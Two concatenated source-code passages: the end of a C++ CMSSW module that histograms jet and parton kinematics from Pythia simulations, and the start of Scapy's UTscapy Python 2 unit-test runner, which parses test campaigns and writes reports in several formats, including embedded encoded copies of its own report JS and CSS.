debug = cfg.getParameter<bool>("debug");
eventsGen = cfg.getParameter<int>("eventsGen");
anaLevel = cfg.getParameter<std::string>("anaLevel");
xsecGen = cfg.getParameter<vector<double> >("xsecGen");
ptHatEdges = cfg.getParameter<vector<double> >("ptHatEdges");
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::beginJob() {
TString hname;
m_file = new TFile(HistoFileName.c_str(), "RECREATE");
/////////// Booking histograms //////////////////////////
const int nMassBins = 103;
double massBoundaries[nMassBins + 1] = {
1, 3, 6, 10, 16, 23, 31, 40, 50, 61, 74, 88, 103, 119, 137,
156, 176, 197, 220, 244, 270, 296, 325, 354, 386, 419, 453, 489, 526, 565,
606, 649, 693, 740, 788, 838, 890, 944, 1000, 1058, 1118, 1181, 1246, 1313, 1383,
1455, 1530, 1607, 1687, 1770, 1856, 1945, 2037, 2132, 2231, 2332, 2438, 2546, 2659, 2775,
2895, 3019, 3147, 3279, 3416, 3558, 3704, 3854, 4010, 4171, 4337, 4509, 4686, 4869, 5058,
5253, 5455, 5663, 5877, 6099, 6328, 6564, 6808, 7060, 7320, 7589, 7866, 8152, 8447, 8752,
9067, 9391, 9726, 10072, 10430, 10798, 11179, 11571, 11977, 12395, 12827, 13272, 13732, 14000};
hname = "JetPt";
m_HistNames1D[hname] = new TH1F(hname, hname, 500, 0, 5000);
hname = "JetEta";
m_HistNames1D[hname] = new TH1F(hname, hname, 120, -6, 6);
hname = "JetPhi";
m_HistNames1D[hname] = new TH1F(hname, hname, 100, -M_PI, M_PI);
hname = "NumberOfJets";
m_HistNames1D[hname] = new TH1F(hname, hname, 100, 0, 100);
hname = "DijetMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DijetMassIn";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassInWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DijetMassOut";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassOutWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "ResonanceMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DipartonMassIn";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassInWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DipartonMassOut";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassOutWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "PtHat";
m_HistNames1D[hname] = new TH1F(hname, hname, 1000, 0, 5000);
hname = "PtHatWt";
m_HistNames1D[hname] = new TH1F(hname, hname, 1000, 0, 5000);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "PtHatFine";
m_HistNames1D[hname] = new TH1F(hname, hname, 5000, 0, 5000);
hname = "PtHatFineWt";
m_HistNames1D[hname] = new TH1F(hname, hname, 5000, 0, 5000);
m_HistNames1D.find(hname)->second->Sumw2();
mcTruthTree_ = new TTree("mcTruthTree", "mcTruthTree");
mcTruthTree_->Branch("xsec", &xsec, "xsec/F");
mcTruthTree_->Branch("weight", &weight, "weight/F");
mcTruthTree_->Branch("pt_hat", &pt_hat, "pt_hat/F");
mcTruthTree_->Branch("nJets", &nJets, "nJets/I");
mcTruthTree_->Branch("etaJet1", &etaJet1, "etaJet1/F");
mcTruthTree_->Branch("etaJet2", &etaJet2, "etaJet2/F");
mcTruthTree_->Branch("ptJet1", &ptJet1, "ptJet1/F");
mcTruthTree_->Branch("ptJet2", &ptJet2, "ptJet2/F");
mcTruthTree_->Branch("diJetMass", &diJetMass, "diJetMass/F");
mcTruthTree_->Branch("etaPart1", &etaPart1, "etaPart1/F");
mcTruthTree_->Branch("etaPart2", &etaPart2, "etaPart2/F");
mcTruthTree_->Branch("ptPart1", &ptPart1, "ptPart1/F");
mcTruthTree_->Branch("ptPart2", &ptPart2, "ptPart2/F");
mcTruthTree_->Branch("diPartMass", &diPartMass, "diPartMass/F");
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::analyze(edm::Event const& evt, edm::EventSetup const& iSetup) {
int notDone = 1;
while (notDone) { //while loop to allow us to tailor the analysis level for faster running.
TString hname;
// Process Info
//edm::Handle< double > genEventScale;
//evt.getByLabel("genEventScale", genEventScale );
//pt_hat = *genEventScale;
edm::Handle<edm::HepMCProduct> MCevt;
evt.getByLabel("generatorSmeared", MCevt);
HepMC::GenEvent* myGenEvent = new HepMC::GenEvent(*(MCevt->GetEvent()));
double pthat = myGenEvent->event_scale();
pt_hat = float(pthat);
delete myGenEvent;
if (anaLevel != "generating") { //We are not generating events, so xsec is there
//edm::Handle< GenRunInfoProduct > genInfoProduct;
///evt.getRun().getByLabel("generator", genInfoProduct );
//xsec = (double)genInfoProduct->externalXSecLO();
xsec = 0.0;
if (ptHatEdges.size() > xsecGen.size()) {
for (unsigned int i_pthat = 0; i_pthat < xsecGen.size(); ++i_pthat) {
if (pthat >= ptHatEdges[i_pthat] && pthat < ptHatEdges[i_pthat + 1])
xsec = float(xsecGen[i_pthat]);
}
} else {
std::cout << "Number of PtHat bin edges too small. Xsec set to zero" << std::endl;
}
} else {
xsec = xsecGen[0]; //Generating events, no xsec in event, get xsec from user input
}
if (debug)
std::cout << "cross section=" << xsec << " pb" << std::endl;
weight = xsec / eventsGen;
if (debug)
std::cout << "pt_hat=" << pt_hat << std::endl;
hname = "PtHat";
FillHist1D(hname, pt_hat, 1.0);
hname = "PtHatFine";
FillHist1D(hname, pt_hat, 1.0);
hname = "PtHatWt";
FillHist1D(hname, pt_hat, weight);
hname = "PtHatFineWt";
FillHist1D(hname, pt_hat, weight);
if (anaLevel == "PtHatOnly")
break; //ptHatOnly should be very fast
// Jet Info
math::XYZTLorentzVector p4jet[2];
float etajet[2];
/////////// Get the jet collection //////////////////////
Handle<JetCollection> jets;
evt.getByLabel(JetAlgorithm, jets);
typename JetCollection::const_iterator i_jet;
int index = 0;
/////////// Count the jets in the event /////////////////
hname = "NumberOfJets";
nJets = jets->size();
FillHist1D(hname, nJets, 1.0);
// Two Leading Jet Info
for (i_jet = jets->begin(); i_jet != jets->end() && index < 2; ++i_jet) {
hname = "JetPt";
FillHist1D(hname, i_jet->pt(), 1.0);
hname = "JetEta";
FillHist1D(hname, i_jet->eta(), 1.0);
hname = "JetPhi";
FillHist1D(hname, i_jet->phi(), 1.0);
p4jet[index] = i_jet->p4();
etajet[index] = i_jet->eta();
if (debug)
std::cout << "jet " << index + 1 << ": pt=" << i_jet->pt() << ", eta=" << etajet[index] << std::endl;
index++;
}
// TTree variables //
etaJet1 = etajet[0];
etaJet2 = etajet[1];
ptJet1 = p4jet[0].pt();
ptJet2 = p4jet[1].pt();
diJetMass = (p4jet[0] + p4jet[1]).mass();
/// Histograms for Dijet Mass Analysis ////
if (index == 2 && abs(etaJet1) < 1.3 && abs(etaJet2) < 1.3) {
hname = "DijetMass";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassWt";
FillHist1D(hname, diJetMass, weight);
}
/// Histograms for Dijet Ratio Analysis: Inner region ///
if (index == 2 && abs(etaJet1) < 0.7 && abs(etaJet2) < 0.7) {
hname = "DijetMassIn";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassInWt";
FillHist1D(hname, diJetMass, weight);
}
/// Histograms for Dijet Ratio Analysis: Outer region ////
if (index == 2 && (abs(etaJet1) > 0.7 && abs(etaJet1) < 1.3) && (abs(etaJet2) > 0.7 && abs(etaJet2) < 1.3)) {
hname = "DijetMassOut";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassOutWt";
FillHist1D(hname, diJetMass, weight);
}
if (anaLevel == "Jets")
break; //Jets level for samples without genParticles
// Parton Info
edm::Handle<std::vector<reco::GenParticle> > genParticlesHandle_;
evt.getByLabel("genParticles", genParticlesHandle_);
if (debug)
for (size_t i = 0; i < genParticlesHandle_->size(); ++i) {
const reco::GenParticle& p = (*genParticlesHandle_)[i];
int id = p.pdgId();
int st = p.status();
const math::XYZTLorentzVector& genP4 = p.p4();
if (i >= 2 && i <= 8)
std::cout << "particle " << i << ": id=" << id << ", status=" << st << ", mass=" << genP4.mass()
<< ", pt=" << genP4.pt() << ", eta=" << genP4.eta() << std::endl;
}
// Examine the 7th particle in pythia.
// It should be either a resonance (abs(id)>=32) or the first outgoing parton
// for the processes we will consider: dijet resonances, QCD, or QCD +contact interactions.
const reco::GenParticle& p = (*genParticlesHandle_)[6];
int id = p.pdgId();
math::XYZTLorentzVector resonance_p, parton1_p, parton2_p;
if (abs(id) >= 32) {
/// We are looking at dijet resonances. ////
resonance_p = p.p4();
hname = "ResonanceMass";
FillHist1D(hname, resonance_p.mass(), 1.0);
const reco::GenParticle& q = (*genParticlesHandle_)[7];
parton1_p = q.p4();
const reco::GenParticle& r = (*genParticlesHandle_)[8];
parton2_p = r.p4();
if (debug)
std::cout << "Resonance mass=" << resonance_p.mass() << ", parton 1 pt=" << parton1_p.pt()
<< ", parton 2 pt=" << parton2_p.pt() << ", diparton mass=" << (parton1_p + parton2_p).mass()
<< std::endl;
} else {
/// We are looking at QCD ////
parton1_p = p.p4();
const reco::GenParticle& q = (*genParticlesHandle_)[7];
parton2_p = q.p4();
if (debug)
std::cout << "parton 1 pt=" << parton1_p.pt() << ", parton 2 pt=" << parton2_p.pt()
<< ", diparton mass=" << (parton1_p + parton2_p).mass() << std::endl;
}
etaPart1 = parton1_p.eta();
etaPart2 = parton2_p.eta();
ptPart1 = parton1_p.pt();
ptPart2 = parton2_p.pt();
diPartMass = (parton1_p + parton2_p).mass();
/// Diparton mass for dijet mass analysis ////
if (abs(etaPart1) < 1.3 && abs(etaPart2) < 1.3) {
hname = "DipartonMass";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassWt";
FillHist1D(hname, diPartMass, weight);
}
/// Diparton mass for dijet ratio analysis: inner region ///
if (abs(etaPart1) < 0.7 && abs(etaPart2) < 0.7) {
hname = "DipartonMassIn";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassInWt";
FillHist1D(hname, diPartMass, weight);
}
/// Diparton mass for dijet ratio analysis: outer region ///
if ((abs(etaPart1) > 0.7 && abs(etaPart1) < 1.3) && (abs(etaPart2) > 0.7 && abs(etaPart2) < 1.3)) {
hname = "DipartonMassOut";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassOutWt";
FillHist1D(hname, diPartMass, weight);
}
// Fill the TTree //
mcTruthTree_->Fill();
notDone = 0; //We are done, exit the while loop
} //end of while
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::endJob() {
/////////// Write Histograms in output ROOT file ////////
if (m_file != nullptr) {
m_file->cd();
mcTruthTree_->Write();
for (std::map<TString, TH1*>::iterator hid = m_HistNames1D.begin(); hid != m_HistNames1D.end(); hid++)
hid->second->Write();
delete m_file;
m_file = nullptr;
}
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::FillHist1D(const TString& histName, const Double_t& value, const Double_t& wt) {
std::map<TString, TH1*>::iterator hid = m_HistNames1D.find(histName);
if (hid == m_HistNames1D.end())
std::cout << "%fillHist -- Could not find histogram with name: " << histName << std::endl;
else
hid->second->Fill(value, wt);
}
/////////// Register Modules ////////
#include "FWCore/Framework/interface/MakerMacros.h"
/////////// Calo Jet Instance ////////
typedef JetAnaPythia<CaloJet> CaloJetAnaPythia;
DEFINE_FWK_MODULE(CaloJetAnaPythia);
/////////// Cen Jet Instance ////////
typedef JetAnaPythia<GenJet> GenJetAnaPythia;
DEFINE_FWK_MODULE(GenJetAnaPythia);
/////////// PF Jet Instance ////////
typedef JetAnaPythia<PFJet> PFJetAnaPythia;
DEFINE_FWK_MODULE(PFJetAnaPythia);
| {
"pile_set_name": "Github"
} |
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
"""
Unit testing infrastructure for Scapy
"""
import sys,getopt,imp
import bz2, base64, os.path, time, traceback, zlib, sha
#### Import tool ####
def import_module(name):
name = os.path.realpath(name)
thepath = os.path.dirname(name)
name = os.path.basename(name)
if name.endswith(".py"):
name = name[:-3]
f,path,desc = imp.find_module(name,[thepath])
try:
return imp.load_module(name, f, path, desc)
finally:
if f:
f.close()
#### INTERNAL/EXTERNAL FILE EMBEDDING ####
class File:
def __init__(self, name, URL, local):
self.name = name
self.local = local
self.URL = URL
def get_local(self):
return bz2.decompress(base64.decodestring(self.local))
def get_URL(self):
return URL
def write(self, dir):
if dir:
dir += "/"
open(dir+self.name,"w").write(self.get_local())
# Embed a base64 encoded bziped version of js and css files
# to work if you can't reach Internet.
class External_Files:
UTscapy_js = File("UTscapy.js", "http://www.secdev.org/projects/UTscapy/UTscapy.js",
"""QlpoOTFBWSZTWWVijKQAAXxfgERUYOvAChIhBAC/79+qQAH8AFA0poANAMjQAAAG
ABo0NGEZNBo00BhgAaNDRhGTQaNNAYFURJinplGaKbRkJiekzSenqmpA0Gm1LFMp
RUklVQlK9WUTZYpNFI1IiEWEFT09Sfj5uO+qO6S5DQwKIxM92+Zku94wL6V/1KTK
an2c66Ug6SmVKy1ZIrgauxMVLF5xLH0lJRQuKlqLF10iatlTzqvw7S9eS3+h4lu3
GZyMgoOude3NJ1pQy8eo+X96IYZw+ynehsiPj73m0rnvQ3QXZ9BJQiZQYQ5/uNcl
2WOlC5vyQqV/BWsnr2NZYLYXQLDs/Bffk4ZfR4/SH6GfA5Xlek4xHNHqbSsRbREO
gueXo3kcYi94K6hSO3ldD2O/qJXOFqJ8o3TE2aQahxtQpCVUKQMvODHwu2YkaORY
ZC6gihEallcHDIAtRPScBACAJnUggYhLDX6DEko7nC9GvAw5OcEkiyDUbLdiGCzD
aXWMC2DuQ2Y6sGf6NcRuON7QSbhHsPc4KKmZ/xdyRThQkGVijKQ=""")
UTscapy_css = File("UTscapy.css","http://www.secdev.org/projects/UTscapy/UTscapy.css",
"""QlpoOTFBWSZTWTbBCNEAAE7fgHxwSB//+Cpj2QC//9/6UAR+63dxbNzO3ccmtGEk
pM0m1I9E/Qp6g9Q09TNQ9QDR6gMgAkiBFG9U9TEGRkGgABoABoBmpJkRAaAxD1AN
Gh6gNADQBzAATJgATCYJhDAEYAEiQkwIyJk0n6qenpqeoaMUeo9RgIxp6pX78kfx
Jx4MUhDHKEb2pJAYAelG1cybiZBBDipH8ocxNyHDAqTUxiQmIAEDE3ApIBUUECAT
7Lvlf4xA/sVK0QHkSlYtT0JmErdOjx1v5NONPYSjrIhQnbl1MbG5m+InMYmVAWJp
uklD9cNdmQv2YigxbEtgUrsY2pDDV/qMT2SHnHsViu2rrp2LA01YJIHZqjYCGIQN
sGNobFxAYHLqqMOj9TI2Y4GRpRCUGu82PnMnXUBgDSkTY4EfmygaqvUwbGMbPwyE
220Q4G+sDvw7+6in3CAOS634pcOEAdREUW+QqMjvWvECrGISo1piv3vqubTGOL1c
ssrFnnSfU4T6KSCbPs98HJ2yjWN4i8Bk5WrM/JmELLNeZ4vgMkA4JVQInNnWTUTe
gmMSlJd/b7JuRwiM5RUzXOBTa0e3spO/rsNJiylu0rCxygdRo2koXdSJzmUVjJUm
BOFIkUKq8LrE+oT9h2qUqqUQ25fGV7e7OFkpmZopqUi0WeIBzlXdYY0Zz+WUJUTC
RC+CIPFIYh1RkopswMAop6ZjuZKRqR0WNuV+rfuF5aCXPpxAm0F14tPyhf42zFMT
GJUMxxowJnoauRq4xGQk+2lYFxbQ0FiC43WZSyYLHMuo5NTJ92QLAgs4FgOyZQqQ
xpsGKMA0cIisNeiootpnlWQvkPzNGUTPg8jqkwTvqQLguZLKJudha1hqfBib1IfO
LNChcU6OqF+3wyPKg5Y5oSbSJPAMcRDANwmS2i9oZm6vsD1pLkWtFGbAkEjjCuEU
W1ev1IsF2UVmWYFtJkqLT708ApUBK/ig3rbJWSq7RGQd3sSrOKu3lyKzTBdkXK2a
BGLV5dS1XURdKxaRkMplLLQxsimBYZEAa8KQkYyI+4EagMqycRR7RgwtZFxJSu0T
1q5wS2JG82iETHplbNj8DYo9IkmKzNAiw4FxK8bRfIYvwrbshbEagL11AQJFsqeZ
WeXDoWEx2FMyyZRAB5QyCFnwYtwtWAQmmITY8aIM2SZyRnHH9Wi8+Sr2qyCscFYo
vzM985aHXOHAxQN2UQZbQkUv3D4Vc+lyvalAffv3Tyg4ks3a22kPXiyeCGweviNX
0K8TKasyOhGsVamTUAZBXfQVw1zmdS4rHDnbHgtIjX3DcCt6UIr0BHTYjdV0JbPj
r1APYgXihjQwM2M83AKIhwQQJv/F3JFOFCQNsEI0QA==""")
def get_local_dict(cls):
return dict(map(lambda (x,y): (x, y.name), filter(lambda (x,y): isinstance(y, File), cls.__dict__.items())))
get_local_dict = classmethod(get_local_dict)
def get_URL_dict(cls):
return dict(map(lambda (x,y): (x, y.URL), filter(lambda (x,y): isinstance(y, File), cls.__dict__.items())))
get_URL_dict = classmethod(get_URL_dict)
#### HELPER CLASSES FOR PARAMETRING OUTPUT FORMAT ####
class EnumClass:
def from_string(cls,x):
return cls.__dict__[x.upper()]
from_string = classmethod(from_string)
class Format(EnumClass):
TEXT = 1
ANSI = 2
HTML = 3
LATEX = 4
XUNIT = 5
#### TEST CLASSES ####
class TestClass:
def __getitem__(self, item):
return getattr(self, item)
def add_keywords(self, kw):
if kw is str:
self.keywords.append(kw)
else:
self.keywords += kw
class TestCampaign(TestClass):
def __init__(self, title):
self.title = title
self.filename = None
self.headcomments = ""
self.campaign = []
self.keywords = []
self.crc = None
self.sha = None
self.preexec = None
self.preexec_output = None
def add_testset(self, testset):
self.campaign.append(testset)
def __iter__(self):
return self.campaign.__iter__()
def all_tests(self):
for ts in self:
for t in ts:
yield t
class TestSet(TestClass):
def __init__(self, name):
self.name = name
self.set = []
self.comments = ""
self.keywords = []
self.crc = None
self.expand = 1
def add_test(self, test):
self.set.append(test)
def __iter__(self):
return self.set.__iter__()
class UnitTest(TestClass):
def __init__(self, name):
self.name = name
self.test = ""
self.comments = ""
self.result = ""
self.res = True # must be True at init to have a different truth value than None
self.output = ""
self.num = -1
self.keywords = []
self.crc = None
self.expand = 1
def __nonzero__(self):
return self.res
#### PARSE CAMPAIGN ####
def parse_campaign_file(campaign_file):
test_campaign = TestCampaign("Test campaign")
test_campaign.filename= campaign_file.name
testset = None
test = None
testnb = 0
for l in campaign_file.readlines():
if l[0] == '#':
continue
if l[0] == "~":
(test or testset or campaign_file).add_keywords(l[1:].split())
elif l[0] == "%":
test_campaign.title = l[1:].strip()
elif l[0] == "+":
testset = TestSet(l[1:].strip())
test_campaign.add_testset(testset)
test = None
elif l[0] == "=":
test = UnitTest(l[1:].strip())
test.num = testnb
testnb += 1
testset.add_test(test)
elif l[0] == "*":
if test is not None:
test.comments += l[1:]
elif testset is not None:
testset.comments += l[1:]
else:
test_campaign.headcomments += l[1:]
else:
if test is None:
if l.strip():
print >>sys.stderr, "Unkonwn content [%s]" % l.strip()
else:
test.test += l
return test_campaign
def dump_campaign(test_campaign):
print "#"*(len(test_campaign.title)+6)
print "## %(title)s ##" % test_campaign
print "#"*(len(test_campaign.title)+6)
if test_campaign.sha and test_campaign.crc:
print "CRC=[%(crc)s] SHA=[%(sha)s]" % test_campaign
print "from file %(filename)s" % test_campaign
print
for ts in test_campaign:
if ts.crc:
print "+--[%s]%s(%s)--" % (ts.name,"-"*max(2,80-len(ts.name)-18),ts.crc)
else:
print "+--[%s]%s" % (ts.name,"-"*max(2,80-len(ts.name)-6))
if ts.keywords:
print " kw=%s" % ",".join(ts.keywords)
for t in ts:
print "%(num)03i %(name)s" % t
c = k = ""
if t.keywords:
k = "kw=%s" % ",".join(t.keywords)
if t.crc:
c = "[%(crc)s] " % t
if c or k:
print " %s%s" % (c,k)
#### COMPUTE CAMPAIGN DIGESTS ####
def crc32(x):
return "%08X" % (0xffffffffL & zlib.crc32(x))
def sha1(x):
return sha.sha(x).hexdigest().upper()
def compute_campaign_digests(test_campaign):
dc = ""
for ts in test_campaign:
dts = ""
for t in ts:
dt = t.test.strip()
t.crc = crc32(dt)
dts += "\0"+dt
ts.crc = crc32(dts)
dc += "\0\x01"+dts
test_campaign.crc = crc32(dc)
test_campaign.sha = sha1(open(test_campaign.filename).read())
#### FILTER CAMPAIGN #####
def filter_tests_on_numbers(test_campaign, num):
if num:
for ts in test_campaign:
ts.set = filter(lambda t: t.num in num, ts.set)
test_campaign.campaign = filter(lambda ts: len(ts.set) > 0, test_campaign.campaign)
def filter_tests_keep_on_keywords(test_campaign, kw):
def kw_match(lst, kw):
for k in lst:
if k in kw:
return True
return False
if kw:
for ts in test_campaign:
ts.set = filter(lambda t: kw_match(t.keywords, kw), ts.set)
def filter_tests_remove_on_keywords(test_campaign, kw):
def kw_match(lst, kw):
for k in kw:
if k not in lst:
return False
return True
if kw:
for ts in test_campaign:
ts.set = filter(lambda t: not kw_match(t.keywords, kw), ts.set)
def remove_empty_testsets(test_campaign):
test_campaign.campaign = filter(lambda ts: len(ts.set) > 0, test_campaign.campaign)
#### RUN CAMPAIGN #####
def run_campaign(test_campaign, get_interactive_session, verb=2):
passed=failed=0
if test_campaign.preexec:
test_campaign.preexec_output = get_interactive_session(test_campaign.preexec.strip())[0]
for testset in test_campaign:
for t in testset:
t.output,res = get_interactive_session(t.test.strip())
the_res = False
try:
if res is None or res:
the_res= True
except Exception,msg:
t.output+="UTscapy: Error during result interpretation:\n"
t.output+="".join(traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback,))
if the_res:
t.res = True
res = "passed"
passed += 1
else:
t.res = False
res = "failed"
failed += 1
t.result = res
if verb > 1:
print >>sys.stderr,"%(result)6s %(crc)s %(name)s" % t
test_campaign.passed = passed
test_campaign.failed = failed
if verb:
print >>sys.stderr,"Campaign CRC=%(crc)s SHA=%(sha)s" % test_campaign
print >>sys.stderr,"PASSED=%i FAILED=%i" % (passed, failed)
#### INFO LINES ####
def info_line(test_campaign):
filename = test_campaign.filename
if filename is None:
return "Run %s by UTscapy" % time.ctime()
else:
return "Run %s from [%s] by UTscapy" % (time.ctime(), filename)
def html_info_line(test_campaign):
filename = test_campaign.filename
if filename is None:
return """Run %s by <a href="http://www.secdev.org/projects/UTscapy/">UTscapy</a><br>""" % time.ctime()
else:
return """Run %s from [%s] by <a href="http://www.secdev.org/projects/UTscapy/">UTscapy</a><br>""" % (time.ctime(), filename)
#### CAMPAIGN TO something ####
def campaign_to_TEXT(test_campaign):
output="%(title)s\n" % test_campaign
output += "-- "+info_line(test_campaign)+"\n\n"
output += "Passed=%(passed)i\nFailed=%(failed)i\n\n%(headcomments)s\n" % test_campaign
for testset in test_campaign:
output += "######\n## %(name)s\n######\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += "###(%(num)03i)=[%(result)s] %(name)s\n%(comments)s\n%(output)s\n\n" % t
return output
def campaign_to_ANSI(test_campaign):
output="%(title)s\n" % test_campaign
output += "-- "+info_line(test_campaign)+"\n\n"
output += "Passed=%(passed)i\nFailed=%(failed)i\n\n%(headcomments)s\n" % test_campaign
for testset in test_campaign:
output += "######\n## %(name)s\n######\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += "###(%(num)03i)=[%(result)s] %(name)s\n%(comments)s\n%(output)s\n\n" % t
return output
def campaign_to_xUNIT(test_campaign):
output='<?xml version="1.0" encoding="UTF-8" ?>\n<testsuite>\n'
for testset in test_campaign:
for t in testset:
output += ' <testcase classname="%s"\n' % testset.name.encode("string_escape").replace('"',' ')
output += ' name="%s"\n' % t.name.encode("string_escape").replace('"',' ')
output += ' duration="0">\n' % t
if not t.res:
output += '<error><![CDATA[%(output)s]]></error>\n' % t
output += "</testcase>\n"
output += '</testsuite>'
return output
def campaign_to_HTML(test_campaign, local=0):
output = """<html>
<head>
<title>%(title)s</title>
<link rel="stylesheet" href="%%(UTscapy_css)s" type="text/css">
<script language="JavaScript" src="%%(UTscapy_js)s" type="text/javascript"></script>
</head>
<body>
<h1>%(title)s</h1>
<span class=button onClick="hide_all('tst')">Shrink All</span>
<span class=button onClick="show_all('tst')">Expand All</span>
<span class=button onClick="show_passed('tst')">Expand Passed</span>
<span class=button onClick="show_failed('tst')">Expand Failed</span>
<p>
""" % test_campaign
if local:
External_Files.UTscapy_js.write(os.path.dirname(test_campaign.output_file.name))
External_Files.UTscapy_css.write(os.path.dirname(test_campaign.output_file.name))
output %= External_Files.get_local_dict()
else:
output %= External_Files.get_URL_dict()
if test_campaign.crc is not None and test_campaign.sha is not None:
output += "CRC=<span class=crc>%(crc)s</span> SHA=<span class=crc>%(sha)s</span><br>" % test_campaign
output += "<small><em>"+html_info_line(test_campaign)+"</em></small>"
output += test_campaign.headcomments + "\n<p>PASSED=%(passed)i FAILED=%(failed)i<p>\n\n" % test_campaign
for ts in test_campaign:
for t in ts:
output += """<span class=button%(result)s onClick="goto_id('tst%(num)il')">%(num)03i</span>\n""" % t
output += "\n\n"
for testset in test_campaign:
output += "<h2>" % testset
if testset.crc is not None:
output += "<span class=crc>%(crc)s</span> " % testset
output += "%(name)s</h2>\n%(comments)s\n<ul>\n" % testset
for t in testset:
output += """<li class=%(result)s id="tst%(num)il">\n""" % t
if t.expand == 2:
output +="""
<span id="tst%(num)i+" class="button%(result)s" onClick="show('tst%(num)i')" style="POSITION: absolute; VISIBILITY: hidden;">+%(num)03i+</span>
<span id="tst%(num)i-" class="button%(result)s" onClick="hide('tst%(num)i')">-%(num)03i-</span>
""" % t
else:
output += """
<span id="tst%(num)i+" class="button%(result)s" onClick="show('tst%(num)i')">+%(num)03i+</span>
<span id="tst%(num)i-" class="button%(result)s" onClick="hide('tst%(num)i')" style="POSITION: absolute; VISIBILITY: hidden;">-%(num)03i-</span>
""" % t
if t.crc is not None:
output += "<span class=crc>%(crc)s</span>\n" % t
output += """%(name)s\n<span class="comment %(result)s" id="tst%(num)i" """ % t
if t.expand < 2:
output += """ style="POSITION: absolute; VISIBILITY: hidden;" """
output += """><br>%(comments)s
<pre>
%(output)s</pre></span>
""" % t
output += "\n</ul>\n\n"
output += "</body></html>"
return output
def campaign_to_LATEX(test_campaign):
output = r"""\documentclass{report}
\usepackage{alltt}
\usepackage{xcolor}
\usepackage{a4wide}
\usepackage{hyperref}
\title{%(title)s}
\date{%%s}
\begin{document}
\maketitle
\tableofcontents
\begin{description}
\item[Passed:] %(passed)i
\item[Failed:] %(failed)i
\end{description}
%(headcomments)s
""" % test_campaign
output %= info_line(test_campaign)
for testset in test_campaign:
output += "\\chapter{%(name)s}\n\n%(comments)s\n\n" % testset
for t in testset:
if t.expand:
output += r"""\section{%(name)s}
[%(num)03i] [%(result)s]
%(comments)s
\begin{alltt}
%(output)s
\end{alltt}
""" % t
output += "\\end{document}\n"
return output
#### USAGE ####
def usage():
print >>sys.stderr,"""Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX}] [-o output_file]
[-t testfile] [-k keywords [-k ...]] [-K keywords [-K ...]]
[-l] [-d|-D] [-F] [-q[q]] [-P preexecute_python_code]
[-s /path/to/scpay]
-l\t\t: generate local files
-F\t\t: expand only failed tests
-d\t\t: dump campaign
-D\t\t: dump campaign and stop
-C\t\t: don't calculate CRC and SHA
-s\t\t: path to scapy.py
-q\t\t: quiet mode
-qq\t\t: [silent mode]
-n <testnum>\t: only tests whose numbers are given (eg. 1,3-7,12)
-m <module>\t: additional module to put in the namespace
-k <kw1>,<kw2>,...\t: include only tests with one of those keywords (can be used many times)
-K <kw1>,<kw2>,...\t: remove tests with one of those keywords (can be used many times)
-P <preexecute_python_code>
"""
raise SystemExit
#### MAIN ####
def main(argv):
import __builtin__
# Parse arguments
FORMAT = Format.ANSI
TESTFILE = sys.stdin
OUTPUTFILE = sys.stdout
LOCAL = 0
NUM=None
KW_OK = []
KW_KO = []
DUMP = 0
CRC = 1
ONLYFAILED = 0
VERB=2
PREEXEC=""
SCAPY="scapy"
MODULES = []
try:
opts = getopt.getopt(argv, "o:t:f:hln:m:k:K:DdCFqP:s:")
for opt,optarg in opts[0]:
if opt == "-h":
usage()
elif opt == "-F":
ONLYFAILED = 1
elif opt == "-q":
VERB -= 1
elif opt == "-D":
DUMP = 2
elif opt == "-d":
DUMP = 1
elif opt == "-C":
CRC = 0
elif opt == "-s":
SCAPY = optarg
elif opt == "-P":
PREEXEC += "\n"+optarg
elif opt == "-f":
try:
FORMAT = Format.from_string(optarg)
except KeyError,msg:
raise getopt.GetoptError("Unknown output format %s" % msg)
elif opt == "-t":
TESTFILE = open(optarg)
elif opt == "-o":
OUTPUTFILE = open(optarg, "w")
elif opt == "-l":
LOCAL = 1
elif opt == "-n":
NUM = []
for v in map( lambda x: x.strip(), optarg.split(",") ):
try:
NUM.append(int(v))
except ValueError:
v1,v2 = map(int, v.split("-"))
